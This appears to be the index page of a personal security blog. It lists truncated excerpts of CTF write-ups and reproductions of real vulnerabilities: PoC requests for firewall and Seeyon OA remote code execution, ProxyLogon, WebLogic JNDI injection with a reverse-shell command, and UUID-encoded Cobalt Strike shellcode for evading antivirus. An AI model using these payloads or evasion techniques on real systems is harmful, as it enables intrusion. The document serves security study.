c1ay's blog

Original technical blog on information security

2021 N1CTF review
signin: Of the web challenges I only solved the sign-in one (cried). Source:
<?php
//flag is /flag
$path=$_POST['path'];
$time=(isset($_GET['time'])) ? urldecode(date(file_get_contents('php://input'))) : date("Y/m/d H:i:s");
$name="/var/www/tmp/".time().rand().'.txt';
$black="f|ht|ba|z|ro|;|,|=|c|g|da|_";
$bl...
2021 L3HCTF partial web writeups
Team finished 15th overall; only the challenges I personally took part in solving are recorded here. bypass: UploadServlet.java ...
2021 bilibili 1024 Challenge
Security attack-and-defense, question 1: 1024 Programmer's Day, everyone come and join 2233 in the decryption game~ happy_1024_2233:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156 AES ECB; both the ciphertext and the key are given, so just write a script:
import base64
import binascii
from Crypto.Cipher import AES
class AESCip...
PHP deserialization of native classes
Notes on exploiting PHP native classes via deserialization, as encountered in CTFs. Predefined exception classes, e.g. the Exception class. __toString: 2021 2nd National Telecommunications and Internet Industry Vocational Skills Competition - SimplePHP. Source:
<?php
/** maybe you need get the contents in hint.php! Ohhhhh you don't know how to get it? Why don't you t...
A first look at ClickHouse SQLi via 2021 ByteCTF double sqli
Used this challenge to learn a bit about ClickHouse injection along the way. The database error message reveals it is ClickHouse: http://39.105.175.150:30001/?id=1' Official docs: https://clickhouse.com/docs/zh/ SQL injection reference: https://blog.deteact.com/yandex-clickhouse-injection/ Two important points taken from that reference: 1. Unlike some SQL dialects, ClickHouse has strict types; there is no implicit conversion between types. 2. Click...
2021 HW summary: 网康 NS-NGFW RCE reproduction and analysis
The circulating PoC:
POST /directdata/direct/router HTTP/1.1
Host: xxx
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x...
Microsoft Exchange RCE
Reference articles: https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265 https://github.com/sirpedrotavares/Proxylogon-exploit/blob/main/exploit.py CVE-2021-26855 SSRF + CVE-2021-2...
shellcode-uuid AV evasion
Reference article: RIFT: Analysing a Lazarus Shellcode Execution Method. Generating the UUIDs: use Cobalt Strike to generate Python shellcode (Attacks->Packages->Payload Generator, language set to Python; any language works), here x64 shellcode was chosen. Convert the shellcode to UUIDs with Python; because u in uuid.UUID(bytes_le=u) must be exactly 16 bytes long, the shellcode has to be split into 16-byte groups, with the last group padded with \x00. import uuids...
WebLogic CVE-2021-2109 JNDI injection remote code execution reproduction
Affected versions: Weblogic Server 10.3.6.0.0, Weblogic Server 12.1.3.0.0, Weblogic Server 12.2.1.3.0, Weblogic Server 12.2.1.4.0, Weblogic Server 14.1.1.0.0. Exploitation method 1: no-echo exploitation, reverse shell. 1. Tool GitHub address: https://github.com/welk1n/JNDI-Injection-Exploit/releases Run on the VPS: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反...
Seeyon-OA getshell vulnerability reproduction and payload construction
The earliest circulating payload came from the 狼组 knowledge base (Google cache). Vulnerability overview: front-end (unauthenticated) getshell. Affected versions: Seeyon OA < A8+, all versions affected. Exploit payload:
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Inse...
c1ay
Learning to be good at thinking, thinking, thinking.